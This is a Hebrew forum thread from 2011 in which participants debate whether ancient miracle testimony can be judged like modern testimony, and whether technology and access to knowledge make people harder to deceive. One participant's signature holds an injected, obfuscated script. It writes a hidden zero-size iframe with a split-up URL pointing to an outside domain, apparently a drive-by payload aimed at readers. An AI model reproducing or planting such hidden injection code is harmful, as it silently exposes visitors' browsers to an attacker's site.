בית פורומים עצור כאן חושבים

דרכי הסקת מסקנות מתיעוד על המציאות

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-13/10/2011 22:00 לינק ישיר 

דינוזאורוס כתב:

...

כל מה שרציתי לומר היה שאין שום בסיס לדון אנשים שחיו לפני 3000 שנה בכלים אחרים מאנשים שחיים כיום או לפני 200 שנה. בכולם יש לבחון את גבולות השקר והטעות.

ולתגובתך אשמח

דבריך כמעט חסרי קשר לנושא האשכול, למעט הפסקה האחרונה, בה אתה טועה.

גם אם כל אדם כבודד לא השתנה הרבה באלפי השנים האחרונות, הרי שההתפתחות האנושית מנגישה באופן כללי לכל אדם את הידע והכלים של בני אדם אחרים, בהווה ובעבר. מבחינה זו, אחת השלכות הטכנולוגיה האנושית (החל מהכתב ואפילו מהדיבור) היא שלאדם ממוצע יש "מכפיל כח" - והוא אפקטיבית עשוי להתנהג בצורה אינטילגנטית יותר מאדם ממוצע בעבר. נקודות רלוונטיות לאשכול:
  1. אדם היום לרוב מעדיף לפנות לרופא מערבי ולא לרופא אליל, לא משום שבהכרח יש לו האפשרות להבין על מה כ"א מדבר, אלא שיש לו גישה לסטטיסטיקה שאומרת שהרפואה המערבית אפקטיבית יותר. כנ"ל לגבי אדם שחושב שיש הסבר טבעי לכך שהשמש נעלמת באמצע היום, ולא שהאלהים כועסים עליו.
  2. ככל שהזמן עובר, היכולת לשנות ניסוחים של חומר כתוב, או לטעון שנמצא חומר כתוב שהיה מאד דומיננטי בעבר אך אבד - יורדת.
  3. כשאדם לומד היום שהיסטוריית העם שלו כוללת בחירה ע"י אלהים כולל ניסים שארעו בעבר שמוכיחים זאת - הוא עשוי יותר לדעת שאין בכך משהו מיוחד - לעמים רבים יש נאראטיב דומה. יש לו, לכן, סטטיסטיקה שלילית בנושא.
  4. ככל שהזמן עובר, היכולת לשגיאה מתגלגלת ותופחת בזמן קטנה. היכולת לשכנע שנס קרה, וע"ס טענה לאמונה נטולת פקפוקים בכל דור קודם, כביכול, להוסיף עוד ועוד לניסים - יורדת. ככל שהזמן עובר, נותר תיעוד לפקפוק המוקדם. נס חדש, או הגדלת רושמו של נס קודם - קשה יותר.

תוקן על ידי xibolaiyu ב- 13/10/2011 22:31:15

דדווח על תוכן פוגעני

נשלח ב-13/10/2011 23:36 לינק ישיר 

פרזנט,

העובדה של שימוש בסמלים אינה סוד, אלא תופעה שיש לנתח אותה, אבל שוב, לא טענתי עדיין כלום בנושא.

שיבולייהו

מענין מאד שאתה טוען שהטכנולוגיה גורמת לאדם ללכת לרופא מערבי ולא לרופא אליל, אבל אם תשווה את אחוזי הפניה לרפואה אלטרנטיבית בעולם המערבי לפני מאה שנה, כשהטכנולוגיה היתה מפגרת, לזמננו שהטכנולוגיה מהירה כברק, תופתע מאד להיווכח שיש הבדל של אלפי אחוזים, לטובת הפניה לרפואה אלטרנטיבית. העידן שלנו נקרא עידן הניו אייג' בו כל הפנג שואי ועוד מליון תורות מזרחיות חסרות כל בסיס מופצות עד לזרא באתרי אינטרנט טלויזיה איפון וכל ענפי הטכנולוגיה המשוכללת. רוב הפרסומות שקופצות לי על המסך במודרניות מופלאה עוסקות באסטרולוגיה כשפים מהקבלה התאמות נומרולוגיות ושאר פתפותי ביצים,

הסעיפים האחרים לא נוגעים כלל למה שטענתי, לא ניסיתי לבדוק מה הטכנולוגיה יכולה לעזור לנו לברר, אלא ניסיתי לבדוק האם אדם בעידן טכנולוגי הוא יותר פיקח, יותר קשה לעבוד עליו, או שלא. והעובדה היא שהטכנולוגיה משמשת את כל סוגי התרבויות למיניהם, בתרבות הערבית הטלויזיה משמשת להפצת שקרים ותעמולה אבל היא לא גומלת את הערבים מהאמונות הטפלות שלהם, כנ"ל הטלויזיה ההודית וכל הטכנולוגיות שנמצאות גם במדינות מוסלמיות קתוליות. האוריינטציה של התרבות המערבית לכיוון רציונלי לכאורה אינה קשורה לטכנולוגיה ויסודה במאות שנים לאחור. 

גורל האשכול יוכרע על ידי מימוני, חג שמח

תיקון: גורל האשכול יוכרע בידי המשתתפים בו. ובידי הזמן הפנוי שיש בידי בעל הטיפקס. נא לחוס על המשאב הזה. הכו"ח בשם עצכח.

תוקן על ידי עצכח ב- 14/10/2011 10:07:46

תוקן על ידי עצכח ב- 14/10/2011 10:08:46

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 00:39 לינק ישיר 

xibolaiyu כתב:

מענין מאד שאתה טוען שהטכנולוגיה גורמת לאדם ללכת לרופא מערבי ולא לרופא אליל, אבל אם תשווה את אחוזי הפניה לרפואה אלטרנטיבית בעולם המערבי לפני מאה שנה, כשהטכנולוגיה היתה מפגרת, לזמננו שהטכנולוגיה מהירה כברק, תופתע מאד להיווכח שיש הבדל של אלפי אחוזים, לטובת הפניה לרפואה אלטרנטיבית. העידן שלנו נקרא עידן הניו אייג' בו כל הפנג שואי ועוד מליון תורות מזרחיות חסרות כל בסיס מופצות עד לזרא באתרי אינטרנט טלויזיה איפון וכל ענפי הטכנולוגיה המשוכללת. רוב הפרסומות שקופצות לי על המסך במודרניות מופלאה עוסקות באסטרולוגיה כשפים מהקבלה התאמות נומרולוגיות ושאר פתפותי ביצים, 

היום אדם שסובל מכאבים בבטנו, ורופא אומר לו שמדובר באפנדיציט מצד אחד, ושאמאן אומר לו משהו מצד שני, יפנה לרופא - ואל תגיד שיש עליה בפניה לשאמאנים במקרים כאלה. והסיבה איננה משום שהוא מבין מהו בדיוק האפנדיציט, אלא משום שהוא יודע שסטטיסטית, הרופא מצליח יותר במצבים אלה. העליה המדהימה שאתה מדבר עליה בפניה לרפואה האלטרנטיבית היא במקרים שבהם הרפואה המערבית נכשלת (כאבים כרוניים וכו'), ונפיצותה היא סממן של חברת שפע, ממש כשם שאנשים משליכים מכספם על הרבה דברים שלא עשו כן בעבר (יש להם יותר כסף).

הסעיפים האחרים לא נוגעים כלל למה שטענתי,

הסעיפים האחרים בהחלט רלוונטיים לשאלה האם אפקטיבית אנשים מתנהגים בצורה אינטילגנטית יותר מבעבר. המכנה המשותף להם - מכפיל כוח שנובע מנגישות לידע של אחרים.

לא ניסיתי לבדוק מה הטכנולוגיה יכולה לעזור לנו לברר, אלא ניסיתי לבדוק האם אדם בעידן טכנולוגי הוא יותר פיקח,

לא יותר פיקח בתור בודד - כבר סוכם.

יותר קשה לעבוד עליו, או שלא

אפקטיבית אכן יותר קשה. נימקתי למה.

. והעובדה היא שהטכנולוגיה משמשת את כל סוגי התרבויות למיניהם, בתרבות הערבית הטלויזיה משמשת להפצת שקרים ותעמולה אבל היא לא גומלת את הערבים מהאמונות הטפלות שלהם, כנ"ל הטלויזיה ההודית וכל הטכנולוגיות שנמצאות גם במדינות מוסלמיות קתוליות. 

נראה לי שידיעתך את העולם מוטה מאד. בעולם שלך, הטלוויזיה הערבית משמשת להפצת שקרים ותעמולה, והאינטרנט משמש את היפאנים לצפיית סרטוני וידאו של אכילת צואה. במציאות, התפוצה האדירה של אל-ג'זירה, לדוגמה, מאד מגבילה את יכולתם של השליטים הערבים לעבוד על הנתינים שלהם. מסתבר, שומו שמיים, שהערבים ג"כ יודעים להצליב מקורות מידע (גם לכוון אל ג'זירה, אגב).

תוקן מהסיבות הרגילות - הכו"ח בשם עצכח

תוקן על ידי עצכח ב- 14/10/2011 10:05:01

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 10:06 לינק ישיר 

יושארו רק הודעות רלוונטיות. האם מישהו מוכן לסכם מה נאמר עד כה. במה מסכימים, במה חולקים?

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 10:19 לינק ישיר 

עצכח כתב:
האם מישהו מוכן לסכם מה נאמר עד כה.

כן, בהחלט:
  1. הגדרות למושגים כמו "שקר", "שגיאה", וכו'
  2. טענה שאם מוכיחים שטקסט אינו שיקרי או שגוי - אז הוא נכון
  3. הודאה של דינו שאשכול זה כלל אינו עוסק בשאלה מתי נכתבה התורה (מה שדי מוריד מהרלוונטיות של הנקודות האחרות)
  4. קביעה שאנשים בעבר לא היו פחות אינטילגנטיים מהיום (נכונה במובן הצר), שדי פספסה את "מכפיל הכח" שנגישות לידע של אנשים אחרים נותנת היום.

תוקן על ידי xibolaiyu ב- 14/10/2011 10:29:30

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 12:32 לינק ישיר 

שיבולייהו

אני אנסה להסביר שוב: אע"פ שככל הנראה יש ביכלתי הפיזית לכתוב יותר מ8 הודעות ביום, והיו ימים שכתבתי עשרות הודעות, איני מעוניין לגור כאן מול האשכול ולכתוב בצורה רציפה, ובמדה מסויימת אין לי את הזמן לכך. העובדה שעשיתי זאת אתמול נגזרת מכך שהאשכול הוצף שוב ושוב בתגובות, ולא נח לי להרגיש מתעלם. זה בדיוק מה שאמרתי לייתכן מראש, שבמקום דיון עניני בין שנינו יהיה כאן המון רעש וצלצולים שלי אין ענין בהם. אני לא מכריח אף אחד, רק הסברתי לייתכן מתוך הנסיון הדל שלי בפורום את מה שיקרה, ואכן קרה וממשיך לקרות. (למותר לציין שוב שהנימה שלך לא מעודדת דיון, כולל ה'סיכום', זו זכותך, אבל אינך יכול גם לטעון שיהיה באפשרותי לדבר אתך. דבריך בענין הדפי זהב וכו' נמחקו מהאשכול הראשון על כן לא מצאתים, סליחה).

לגבי עיקר דבריך אני סובר שאתה טועה (וכן צענע שכתבה זאת לעיל) הטכנולוגיה לא עושה את האנשים ליותר נאורים או יותר חכמים או יותר צודקים, היא רק משמשת לשטיפת מח או להזרמת מידע של בעליה. בחברה המערבית משווקים את מה שנראה בעיניך (לפי התרשמותי) כנכון צודק וכו', אבל בחברות אחרות משווקים את מה שנראה בעיניהם כנכון צודק, בלי שום הבדל בין אמונות טפלות ללא טפלות, מופתים או מטריאליזם. האינטרנט המערבי מציע את ההשקפה של הזרם המרכזי, אבל הוא מציע גם בריאתנות, בכמויות שלא נשמעו לפני היות האינטרנט (בחיים לא היית שומע על אגודת כדור הארץ המרובע בלי האינטרנט, גגל ותמצא), הוא מציע השקפה מטריאליסטית, אבל הוא מציע גם כמויות של ניו איג', הטלויזיה מציעה גם הרבה מיסטיקה, ואני מניח שהתכניות של זמן מיסטיקה כובשות הרבה לבבות שבלעדי הטכנולוגיה היו הרבה יותר מטריאליסטים תמימים. הטלויזיה הערבית יכולה לספק מה שהיא רוצה, בלי קשר לדוגמאות שהבאתי, היא משווקת מה שהיא רוצה וחושבת, ולא דוקא בכיוון של רציונליות יתר. העובדה שהערבים רוצים להפיל משטר מסויים לא הופכת זאת לרציונליות או משהו כזה, חלק גדול מהכחות של הפלת המשטרים נובעים מהאיסלם הקיצוני הפחות נאור, שראה במובארק ודומיו ידידים של המערב. אם לבחדרי חרדים היה ערוץ טלויזיה הרי הוא היה יכול לרכוש אלפי לבבות למופתי העץ של הרב לפקוביץ, וכך הלאה. בערוץ הידברות שידרו את המופת של האשה מרכסים שעשן הנרות שלה יצר את צורתו של מור סידנא בבא סאלי וכך כל העולם נוכח באמת הגדולה, גם אם במקרה של הדיבוק מברזיל היה מי שחשב שוידוי אישי שלו ישנה את המופת, והיה מי שחשב, שהסבר מעמיק של מומחה גדול לגלגולים ודיבוקים כיצד דוקא לאחר הדיבוק מתלבש בו דיבוק הפכיי שגורם לו להכחיש, תרם הרבה יותר למופתיאדה. מכפיל כח הוא לא יותר צודק ולא יותר חכם, הוא רק מכפיל את הכח של הבעלים. ולכן תלוי מי הבעלים, אם במקרה בעיניך הבעלים של התקשורת המערבית הוא צודק, זה לא בגלל התקשורת, אלא בגלל שבעיניך הוא צודק, והיה צודק בעיניך גם לפני התקשורת. בנוסף לעובדה שהתקשורת המערבית עברה שינוי בעשרות האחרונות וקשה להגדירה כרציונלית, זאת מבדיקה סטטיסטית גרידא של נושאי שידור (מי לא זוכר את הסנסציה של תכנית הרדיו 'פונדק הרוחות' בשנות ה80 שגרמה להמונים להאמין ולראות רוחות), זה בכלל לא משנה אם מדובר בחברת שפע או לא שפע או מה הגורמים, אולי גם הגורמים לאלילות בזמנה היה השפע של הקוקוסים בגן עדן האבוד. העובדה היא שהטכנולוגיה לא משרתת דוקא צד מסויים מקשת הדעות. ובמשפט אחד: הטכנולוגיה לא מחכימה אלא משפיעה, הכל תלוי מי מנהל אותה. אם האלילות לא היתה ממוגרת אני בטוח שהיו להם אחלה ערוצים, כמוש בכבלים וכדו', בהם היה אפשר לראות את כל המופתים בשידור חי. אמנם דבר אחד כמובן נכון, שבחברה בה האוריינטציה נוטה להכחשת ניסים יותר קשה לספר על נסים, מאשר בחברה בה האוריינטציה הפוכה. יותר מדוייק: בחברה המודרנית מניחים כהנחת יסוד שנסים לא יתכנו, ולכן אין אפשרות לדבר על משהו שמנוגד לאקסיומה אפריורית. לא על זה באתי לדבר, אלא על הטבע האנושי, אנו מכירים חברות נוספות ואחרות בזמננו, גם קרוב מאד אלינו.

נראה לי שאם צריכים סיכום כדאי שייתכן יעשה זאת, ואני שמח לראות שהוא קיבל את עצתי, שדיון לא חייב להיות צ'ט, אפשר גם לחכות יומיים או שלשה ואפילו שבוע, להרהר בדברים בכובד ראש, לחזור לכאן ולראות שלא קרה שום דבר והאשכול עדיין ממתין. לא מדובר באיזו הברקה שלי, בעבר קבעו כאן על דעת המקום ועל דעת הקהל שסימן שלשת הצלבים +++ יקבע שאשכול מוקדש לדיון בין שני אנשים, או בקו מוגדר, ולא קרה שום דבר.

הק' דינו

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 12:45 לינק ישיר 

שיבולאיו

ירוקון על הסיכום הקצר.

דינו

המונח "מופתיאדה" צריך להגיע ללכסיקון הפורום. אשתדל. טול בינתים ירוקון.

לגבי ייחודיות (אקסלוסיביות) הדיון, סבורני ששיבולאיו ראוי להיות מן המשתתפים שיורשו לכתוב פה (אך עליו לחסוך את זמני ולהביע את הסתייגותו בלשון מאופקת ככל האפשר. וכן כולם).

אם אינך מסכים לסיכום של שיבולאיו, אנא הוסף במשפטים קצרים בלבד במה אינך מסכים איתו. (לא הוכחות, אלא נקודות).

לגבי הטכנולוגיה והפסיכולוגיה האנושית, אני מבקש להוסיף:

1. סף הידע עלה בעקבות הופעת מערכת החינוך וההשכלה הזמינה לכל בארצות המפותחות. נדמה לי שזה גם אחד המאפיינים של ארץ מפותחת, לימוד קרוא וכתוב וידיעות מסויימות. כפי שכתב גם ר' אלחנן וסרמן לפני כ80 שנה, מה שהרמב"ם הכליל בידע איזוטרי פיזיקלי היום, כלומר אז, יכול להיות ידוע לכל ילד בתיכון, אם לא ביסודי (פרפרזה שלי כמובן).

2. כמובן, עלית סף הידע לא הפכה את האדם ליותר ביקורתי. רא"ו עצמו האמין בגלגולים. או לפחות סיפר עליהם.

3. אולי ניתן להסיק שהטכנולוגיה מזמנת לאדם יותר חומר, והוא צריך לבחור בין להאמין בשטויות או לפתח כלי מחשבה לביקורת.

כלים כאלו לא עמדו לרשותם של רוב אזרחי ימי הבינים ותקופות עתיקות יותר.

כמדומה שאפילו בחברה שלנו, החרדית, יש איזה קו שבר כאשר לצד אלו שממהרים להצהיר על אמונתם ב"מופתים" הם אינם יכולים להתחמק מכך שיש מערערים עליהם. וגם זו ידיעה ברמה מסויימת של ההבדל בין בדיון לעובדה. וזה כמדומה לא היה קיים ולא היה זמין לבני העולם העתיק.

עכשו אני רואה שכבר אתה כתבת זאת בלשונך שלך:

אם האלילות לא היתה ממוגרת אני בטוח שהיו להם אחלה ערוצים, כמוש בכבלים וכדו', בהם היה אפשר לראות את כל המופתים בשידור חי. אמנם דבר אחד כמובן נכון, שבחברה בה האוריינטציה נוטה להכחשת ניסים יותר קשה לספר על נסים, מאשר בחברה בה האוריינטציה הפוכה. יותר מדוייק: בחברה המודרנית מניחים כהנחת יסוד שנסים לא יתכנו, ולכן אין אפשרות לדבר על משהו שמנוגד לאקסיומה אפריורית.

הנחת היסוד הזו ששוללת כל מה שלא מדעי (ולא רק נס) היא אכן מונחת בתרבות המדעית אבל לצידה יש הנחת יסוד סותרת שגם היא מונחלת מן הדת (איזו דת שתהא כמעט) ומן הפסיכולוגיה (אנו רוצים להאמין בזה אך מפחדים) שיש ניסים ויש "על טבעי" שהמדע מתעלם ממנו.

בקיצור של הקיצור, (וזו תובנה שקיבלתי מן הדיון הזה ותודה לכולם): התרבות המודרנית מנחילה לילדיה סתירה בין אמונה במדע השוללת דת אך גם אלילות, נס אך גם כישוף, אך מותירה שפע של תופעות או תופעות כביכול מהצד ההפוך ולכן האדם צריך לבחור. ובידו לבחור, וזה שורש הטוב וזה שורש האלילות.

ושוב בהרחבה:

אליהו קרא לעם לבחור בין שני הסעיפים: אלילות או מונותיאיזם. היום הקריאה היא לבחור בין שילוש או אפילו יותר: מדע שולל כל דת, יהדות או דת אחרת להבדיל, אמונה בחריג ובפורץ גבולות המדע. וכיון שהאדם אינו רק שכל טהור, פעמים רבות הוא בוחר בכולם יחד או על כל פנים ביותר מצד אחד.

הנקודה החשובה בהשוואה היא מה עמד לפני הבוחר. בימי אליהו, בין דת לדת (להבדיל). בימינו: עושר של אפשרויות. וזה גדל בזכות הטכנולוגיה והמדע, ועל זה אי אפשר לערער (לא כתבתי: כמדומה).

_נוספה הדגשה לציטוט מדברי דינו________________

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 14/10/2011 12:46:21

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 13:38 לינק ישיר 

נגזרה גזירה ובעולם העשייה אי אפשר להימלט מפרוצדורה.

צענע,

מדוע את מתנגדת לדיון אחד על אחד? אין כאן התנשאות או משהו מעין זה. בסך הכול ניסיון לחדד את שאלות היסוד עד לנקודת גרעין הוויכוח. קצת קשה לעשות זאת ברוב עם.

במידה והדיון לא מעניין, יש לי טיפ נפלא שאני עושה בו שימוש לעתים והצלחתו בדוקה ומנוסה. משום אל תמנע טוב אחלוק אותו עם כל הגולשים. ניתן פשוט לא לצפות.

הצעתך לאשכול מקביל מצוינת. הרימי את הכפפה.

ולעניין שלשמו התכנסנו.

האם יש ירידת הדורות או דווקא עליית הדורות? זו שאלה מעניינת שיש לדון בה באריכות ובנפרד.

לצורך הדיון, המידע על החברה שקיבלה את התורה, יישאב אך ורק מהתנ"ך.

בחברה זו הפיכת מקלות לנחשים וחוזר חלילה מבוצעת בידי כל פרח חרטומים.

במקרא אין ייצוג לטיעון כי אין אלוהים. זו הנחת יסוד פשוטה. כל הדיון הוא של מי יותר גדול.

יש גם הסכמה מקיר לקיר על היות האל מנבא בני אדם.

אני מגביל את עצמי רק למקרא. אם כל התנ"ך ירד מאותו שמים, יש לי עוד מה לומר.

הדוגמה מהמשיחיסטים מצוינת, עד כמה שזה נוגע לדיון על כל דבר, חוץ משאלת עובדת חיים חיותו בפועל של מהמשל"ו וכל המסתעף.

אני מניח כי גם לך ברור כי תפיסת עולם מיסטית יש בה כדי לגרום לאדם לראות בחוש דברים שאני ואתה לא נצליח לראות גם אם נתאמץ מאד. נכון, לא כל דבר, אבל יש הבדל בין תפיסת המציאות, הנובעת מאירועים מיסטיים, או בעלת השלכות מיסטיות, בין אנשים מן הישוב לבין בעלי אמונות שונות.

מכאן, לעולם בו רוב תופעות הטבע נתפסו כפעולות ישירות של אילים. הנחה זו אינה נובעת מציורים וסמלים, אלא מתיעוד רב. אולי לאו דווקא מיום מתן תורה, אבל לאורך כל התקופה והרבה אחריה. יש לכך לא מעט הדים גם בתורה.

אין להתעלם גם מדלות אפשרות התיעוד והפצת מידע וחוסר הנגישות למידע, כולל אוריינות בסיסית, שהיה בה כדי לסייע להפיץ סיפורים ולמנוע ביקורת הכרחית, להקשות מאד על מי שבכל זאת רוצה לבקר ולהכחיש, ולהשתיק את קולות הביקורת וההכחשה אם היו.

דיברת על הנהיה המתגברת לרפואה אלטרנטיבית. אני מסכים לתשובתו של "יהודי". אני רק רוצה להוסיף כי עד שזכינו לקבלת תורת המדע בידי אדם, כמעט כל הרפואה הייתה "אלטרנטיבית" במובן שהסתמכה רבות על השערות פרועות ופחות על ניסוי ובדיקה.

גם בעולם זה אינני טוען כי אפשר לביים הכול, אך בכל זאת עלינו לדון על עדויות מתוך פרספקטיבה זו.

אנו יודעים כי ככל שאנשים נטו יותר לבדוק ולבדוק ולבדוק וככל שהשתכללו צורות התיעוד הישיר והמשתמר, פחתו והלכו הנסים והנפלאות.

תופעת הדיבוקים נעלמה מן העולם בד בבד עם הופעת הטלוויזיה.

מי כמוך יודע, כי ככל שהציבור הליטאי הלך ונדבק בחיידק הטורף של המופתים, רבו מאד המופתים המתרחשים על ידי בעלי מופת ליטאיים.

כיוון שעדיין עוד לא הגענו לשלב בו אנו מדברים על אירועים קונקרטיים אני מסתפק באמירה כללית זו.

אינני יודע אם שמת לב, אך בדבריך הבאת דוגמאות לא פשוטות של הכחשה מאורגנת במילתא דגלויי, נגד טיעון שמגובה במסמכים ועדויות.

הגיע הזמן לדון על דוגמאות ולנסות לנתחן.

דדווח על תוכן פוגעני

נשלח ב-14/10/2011 16:38 לינק ישיר 

דינו

אני בעד.

אין כמו דוגמאות כדי להמחיש רעיון. אני מסכים שלפעמים צריך להאריך כדי לקצר, להבהיר במילים ארוכות עד שמבינים דבר פשוט. גם לי אי אפשר להימנע מזה.

אבל בלא דוגמאות הדברים נשארים תלושים או נותנים מקום לויכוח. דוגמא מראה למה שאתה מתכוון בדייקנות (כמו הדוגמא שלי מדברי אליהו בהר הכרמל). על דוגמא גם כן מתווכחים, אבל זה ויכוח מסוג אחר.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 18:45 לינק ישיר 

דינוזאורוס כתב:
אני אנסה להסביר שוב: אע"פ שככל הנראה יש ביכלתי הפיזית לכתוב יותר מ8 הודעות ביום, והיו ימים שכתבתי עשרות הודעות, איני מעוניין לגור כאן מול האשכול ולכתוב בצורה רציפה, ובמדה מסויימת אין לי את הזמן לכך. העובדה שעשיתי זאת אתמול נגזרת מכך שהאשכול הוצף שוב ושוב בתגובות, ולא נח לי להרגיש מתעלם. זה בדיוק מה שאמרתי לייתכן מראש, שבמקום דיון עניני בין שנינו יהיה כאן המון רעש וצלצולים שלי אין ענין בהם. אני לא מכריח אף אחד, רק הסברתי לייתכן מתוך הנסיון הדל שלי בפורום את מה שיקרה, ואכן קרה וממשיך לקרות.
חבל שאתה מתעקש לנמק הכל למעט שלילתך את מה שהוצע לך מספר פעמים: שתתכתב בפרטי עם ייתכן לפי קצבך.

דבריך בענין הדפי זהב וכו' נמחקו מהאשכול הראשון על כן לא מצאתים, סליחה
חזרה על שקר לא תהפכו לאמת, סליחה. דברי באשכול, כפי שציינתי מספר פעמים, הפוכים לחלוטין למה שאתה מייחס לי, סליחה.

למותר לציין שוב שהנימה שלך לא מעודדת דיון
למותר לציין שדבריך במוצהר אינם מעודדים דיון (למעט עם ייתכן), ובנוגע אלי הם גם שקריים בעקביות.

לגבי עיקר דבריך אני סובר שאתה טועה (וכן צענע שכתבה זאת לעיל) הטכנולוגיה לא עושה את האנשים ליותר נאורים או יותר חכמים או יותר צודקים, היא רק משמשת לשטיפת מח או להזרמת מידע של בעליה. בחברה המערבית משווקים את מה שנראה בעיניך (לפי התרשמותי) כנכון צודק וכו', אבל בחברות אחרות משווקים את מה שנראה בעיניהם כנכון צודק, בלי שום הבדל בין אמונות טפלות ללא טפלות, מופתים או מטריאליזם. האינטרנט המערבי מציע את ההשקפה של הזרם המרכזי, אבל הוא מציע גם בריאתנות, בכמויות שלא נשמעו לפני היות האינטרנט (בחיים לא היית שומע על אגודת כדור הארץ המרובע בלי האינטרנט, גגל ותמצא)...

אתה טועה לדעתי בשתי נקודות עיקריות: בהבדל בין אינטליגנציה של פרטים לאינטלגינציה של קבוצות, ולהבדל בין עובדות בעלות השלכות משמעותיות מדידות ביום יום לבין דברים אחרים (כגון הכרעות ערכיות). אתחיל בנקודה השניה, בה כבר טעית לדעתי לגבי רופא / שאמאן.

1. עם התפשטות הטלוויזיה הלוויינית במדינות ערב, חלה עליה ממוצעת משמעותית בעובדות הידועות לכל אזרח לגבי סביבתו. כבר אי אפשר לשקר שהצבא המובס ניצח, או שהמצב הכלכלי הוא יחסית בסדר. למרבה הצער, התברר שהדבר אינו גורם בהכרח לאימוץ ערכי הליברליזם המערבי (הכרעה ערכית). שני הדברים הללו שונים קטגורית.

בPubMed יש מעל 230,000 אזכורים לאבולוציה במאמרים מעשיים ברפואה, ביוכימיה, ביולוגיה מולקולרית, וגנטיקה. חברות פארמה משתמשות בביולוגיה אבולוציונית בפיתוח מוצרים. אף אדם, כולל אלה שנחשפו לאתרי הבריאתנות שאתה מציין, לא יידחה תוצר של מחקרים שהאבולוציה קידמה אותם. אף אדם אינו חושב שאין צורך להזהר מנגיף האיידס בשל העובדה שמה שגורם לשרידותו מתאים לתיאוריה. מה שאנשים דוחים הם דברים מסדר שני או שלישי: המסקנות לגבי מה שקרה לפני 6,000 שנה (בעלות השלכות מועטות ליום  יום), והמסקנות לגבי קיום אלהים (שאלה תיאולוגית). האבולוציה מנצחת את הבריאתנות בפועל בכל נקודה מדידה ובעלת השלכות ביום יום.

כאן, לכן, לדעתי פשוט חזרת על טענתך הלקוייה לגבי רופא / שאמאן אבל בגרסה אפילו חלשה יותר (אין הוצאות כספיות נלוות).

2. למרות שיש עדות מובהקת סטטיסטית וארוכת טווח לעליה באינטילגנציה הממוצעת של כל פרט (הדבר ידוע בתור Flynn Effect), נצא מתוך נקודת הנחה מקילה שהיא קבועה. סביר מאד שהאינטילגנציה של קבוצה קורלטיבית עם הגודל שלה, והיא כנראה מכילה לא רק רכיב לינארי, אלא גם רכיב ריבועי (עצם המפגש בין אנשים מייצר ידע). ברבים מתחומי המדע, אגב, רואים עליית תוצאות מדידות אקספוננציאלית (אפקט מור, לדוגמה). היום, קשה להתווכח, קבוצות האנשים בקשר גדולה מאשר לפני אלפי שנים. בפרט, לקבוצה של 600 עבדים (שלך תדע באיזו תזונה הם גדלו, אגב), קל הרבה יותר לטעות מאשר קבוצה בת 2,000,000 נפש דומים לנו (ונעזוב לרגע את הגיחוך שבמספר).

לגבי ההשלכות:

1. הנקודות הנ"ל מסבירות היטב מדוע עם הזמן הפסיקו הניסים הלאומיים: אין יותר ימים נבקעים בפקודה, קרישנה כבר לא מרים הר שלם כפי שמוכן להשבע הכפר שהציל, עלטה מסתורית לא נופלת בדיוק כשנצלב ישו, וכו'. ניסים כאלה, שבעבר "הופיעו" בדתות ותרבויות שונות, נעלמו ככל שהאנושות התקדמה.
  2. כפי שציינתי בעבר, עם הזמן, האפשרות ל"רצף ניסים מתגלגל", שכל דור מוסיף לו עוד אירועים ועוד נופך ע"ס האמונה שלפני מספר דורות האמינו בזה - יורדת. לא תהיה אפשרות בעתיד לטעון שכל החוזים בנס גבירתנו מפאטימה לא נותרו סקפטיים.

תוקן על ידי xibolaiyu ב- 15/10/2011 19:23:13

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 23:09 לינק ישיר 

שיבולייהו

אין לי שום בעיה להתכתב עם ייתכן בפרטי, מלכתחלה כתבתי שלא נח לי לדון כאן, וייתכן הוא זה שהציג את הדבר כהתחמקות, מה שהכריח אותי כן לדון כאן. דברי בהחלט אינם מעודדים דיון, הלא הסברתי שאין לי ענין בדיון חוזר כאן, מה גם שזה ענין קשה מבחינה פרקטית, ואני בכל אופן משתתף בו רק משום שייתכן טען שאני מתחמק. דברי שנימתך אינה מעודדת דיון נאמרו כלפי השאלות החוזרות ונשנות מדוע אני מדבר עם ייתכן ולא עם כל העולם, על זה טענתי שלפחות אתה מדבר בצורה שלא מעודדת דיון מכובד. אני כמובן שלא מעודד את הדיון, ובודאי לא עם מישהו אחר חוץ מייתכן, וכבר הצהרתי על כך. (כמו כן ההתעקשות לדוש ולחזור ולדוש בשאלה עם מי אני רוצה לדבר ואיך נראית לי קצת קַטְנוּנִית, שכל אחד ידבר עם מי שרוצה ושלום על ישראל. השומע ישמע והחדל יחדל).

דבריך בנוגע ליחס בין תקשורת וידע מתפרצים לדלת פתוחה, שכן כמובן שלא טענתי מה שאתה מייחס לי, ברור שאמצעי תקשורת ומידע מגדילים את האינטליגנציה של הפרט. אני טענתי רק שהידע שהתקשורת מעבירה הוא פונקציה של החברה הַמְתַּחְזֶקֶת ויוצרת את התקשורת ותכניה. אין שום ערובה שמה שהתקשרות מגדירה כ'ידע' ואינטליגנציה הוא לא מוטה, שקרי, מגמתי, וכיוצא בזה. אין ספק שנזיר הודי מלא וגדוש באינטליגנציה עצומה שאין לנו מושג לגביה, כשם שבחור ישיבה טעון באינטליגנציה של כמויות חומר עצומות, שהוא מקבל דרך הערוצים הכי מודרניים, היישר מקול הלשון אל הנגן שלו, דרך דיסקים קלטות ערוצי קודש ואפילו 'שופר' בכבלים אם הוא רוצה. בעולם המערבי מעבירים ידע מסוג מסויים, ובמדינות אחרות מעבירים ידע מסוג אחר. אפילו אם נניח שבעולם הערבי התקשורת גרמה לאימוץ ערכים מסויימים שהם יותר חכמים או אמיתיים, אין זה אומר דבר על יחס בין תקשורת לחכמה או לאמת, שכן מחר יכולה התקשורת הערבית לאמץ ערכים שקריים ושאינם הוגנים ולהשפיע על מליונים. התקשורת לא מחכימה אלא מעבירה את הדעות השולטות ביוצריה. יכולה להחכים ולגלות את האמת, ויכולה לשקר ולהעצים את השקר.

